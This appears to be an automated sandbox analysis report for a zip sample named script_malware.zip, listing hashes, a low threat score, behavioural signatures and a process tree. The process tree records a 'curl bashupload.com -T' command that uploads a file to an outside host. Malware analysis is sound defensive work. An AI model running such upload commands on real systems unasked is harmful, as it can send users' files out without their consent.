Analysis
-
max time kernel
593s -
max time network
603s -
platform
windows10-2004_x64 -
resource
win10v2004-20240226-en -
resource tags
arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system -
submitted
15-03-2024 16:07
Static task
static1
Behavioral task
behavioral1
Sample
script_malware.zip
Resource
win7-20240221-en
windows7-x64
0 signatures
1800 seconds
Behavioral task
behavioral2
Sample
script_malware.zip
Resource
win10v2004-20240226-en
windows10-2004-x64
3 signatures
1800 seconds
General
-
Target
script_malware.zip
-
Size
4.4MB
-
MD5
cabc07f288cc71b7447d6098ce3bb245
-
SHA1
2ff090c33470e3c8c2c10888ba0de5539c5126d1
-
SHA256
78276bd481a04c29109fbbd8313701e5b814165fa4b48515ec4489ccfda93107
-
SHA512
7aef8936dd1f734d20a9ab251ab46c22bcaa4c2a012387b7e9fce48e9d870926981c22cf3fac87c2b3bd0ae6f6efe084aaefd15fe229cd1bf085a55e0322dd80
-
SSDEEP
98304:OUCcwlITgiAybrbTWITgJbyvVqUCcwlITgiAybrbTWITgJbyvVvM:pCcCEgiAsTHsyPCcCEgiAsTHsyhM
Score
1/10
Malware Config
Signatures
-
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeRestorePrivilege 4468 7zG.exe Token: 35 4468 7zG.exe Token: SeSecurityPrivilege 4468 7zG.exe Token: SeSecurityPrivilege 4468 7zG.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4468 7zG.exe -
Suspicious use of WriteProcessMemory 6 IoCs
description pid Process procid_target PID 1672 wrote to memory of 4968 1672 cmd.exe 130 PID 1672 wrote to memory of 4968 1672 cmd.exe 130 PID 1672 wrote to memory of 4608 1672 cmd.exe 131 PID 1672 wrote to memory of 4608 1672 cmd.exe 131 PID 1672 wrote to memory of 2760 1672 cmd.exe 132 PID 1672 wrote to memory of 2760 1672 cmd.exe 132
Processes
-
C:\Windows\Explorer.exeC:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\script_malware.zip1⤵PID:32
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4248 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:81⤵PID:4484
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:440
-
C:\Program Files\7-Zip\7zG.exe"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\AppData\Local\Temp\script_malware\" -spe -an -ai#7zMap30023:108:7zEvent326341⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4468
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:1672 -
C:\Windows\system32\curl.execurl2⤵PID:4968
-
-
C:\Windows\system32\curl.execurl bashupload.com -T script_malware.zip2⤵PID:4608
-
-
C:\Windows\system32\curl.execurl bashupload.com -T script_malware.zip2⤵PID:2760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4212 --field-trial-handle=2656,i,16940681401824032220,151921362336696246,262144 --variations-seed-version /prefetch:81⤵PID:1096